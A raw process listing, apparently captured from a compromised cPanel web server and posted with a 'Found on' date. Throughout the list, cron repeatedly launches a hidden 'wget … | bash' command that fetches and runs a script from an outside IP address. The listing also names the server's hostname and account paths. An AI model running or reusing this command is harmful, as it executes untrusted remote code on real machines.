/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/mysqld�--daemonize�--pid-file=/var/run/mysqld/mysqld.pid�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/bin/python2�-es�/usr/sbin/tuned�-l�-p�
/usr/sbin/sshd�-d�
/usr/sbin/pdns_server�--guardian=no�--daemon=no�--disable-syslog�--log-timestamp=no�--write-pid=no�
cpsrvd (ssl) - waiting for connections                    
/usr/sbin/rsyslogd�-n�
pure-ftpd (server)��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

cpdavd - accepting connections on: 2079, 2080, 2090, 2091, 2077, 2078 (dormant)
dnsadmin - dormant mode
cpgreylistd - processor
cpanellogd - sleeping for logs
php-fpm: master process (/usr/local/cpanel/etc/php-fpm.conf)�������������������������
/usr/local/cpanel/bin/splitlogs�--dir=/etc/apache2/logs/domlogs�--main=vps.bolaking88.net�--suffix=-bytes_log�
/usr/local/cpanel/bin/splitlogs�--dir=/etc/apache2/logs/domlogs�--main=vps.bolaking88.net�--mainout=/etc/apache2/logs/access_log�
/usr/local/cpanel/3rdparty/bin/perl�/usr/local/cpanel/bin/leechprotect�
dovecot/pop3-login�
dovecot/imap-login�
dovecot/log�
dovecot/pop3-login�
dovecot/imap-login�
dovecot/config�
dovecot/stats�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
sw-engine-fpm: master process (/etc/sw-engine/sw-engine-fpm.conf)����������������������������������������������������������������������������������

lfd - sleeping
/usr/bin/sw-engine�/usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script�background-tasks-executor.php�
/usr/bin/sw-engine�/usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script�scheduled-tasks-executor.php�
/usr/sbin/crond�-n�
/bin/sh�-c�/usr/local/cpanel/3rdparty/bin/php -d disable_functions="" /usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php >> /dev/null 2>&1�
/usr/local/cpanel/3rdparty/bin/php�-d�disable_functions=�/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

dovecot/auth�
dovecot/lmtp�

dovecot/auth�-w�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�








/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�

/usr/sbin/exim�-ps�-bd�-q1h�-op�/var/spool/exim/exim-daemon.pid�

/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�

/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/bin/sh�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�



/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/lib/systemd/systemd-journald�

/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�

/usr/local/cpanel/3rdparty/perl/532/bin/perl�-t -w�/usr/local/cpanel/3rdparty/bin/spamd�--allowed-ips=127.0.0.1,::1�--max-children=5�--pidfile=/var/run/spamd.pid�--listen=5�--listen=6�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�


/opt/cpanel/ea-php72/root/usr/bin/php�/home/gentingd/viralchan.com/l.php�
/usr/sbin/httpd�-k�start�




queueprocd - waiting up to 60s to process a task

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/lib/systemd/systemd-udevd�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/sbin/auditd�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
tailwatchd




/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/exim�-ps�-bd�-q1h�-op�/var/spool/exim/exim-daemon.pid�
/usr/sbin/dovecot�-f�-c�/etc/dovecot/dovecot.conf�
dovecot/anvil�
/usr/sbin/nscd�
/usr/sbin/smartd�-n�-q�never�
/usr/sbin/pure-authd�-s�/var/run/ftpd.sock�-r�/usr/local/cpanel/bin/pureauth�
/usr/sbin/httpd�-k�start�
/usr/sbin/irqbalance�--foreground�
/usr/sbin/chronyd�

/sbin/rpcbind�-w�
/usr/lib/polkit-1/polkitd�--no-debug�
/usr/lib/systemd/systemd-logind�
/usr/bin/dbus-daemon�--system�--address=systemd:�--nofork�--nopidfile�--systemd-activation�

/usr/sbin/atd�-f�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/sbin/agetty�--noclear�tty1�linux�





/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�



/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/usr/sbin/httpd�-k�start�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/httpd�-k�start�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
spamd child
spamd child
cat�/proc/self/cmdline�

Found on 2022-10-15 23:20

Create report

Domain summary

No record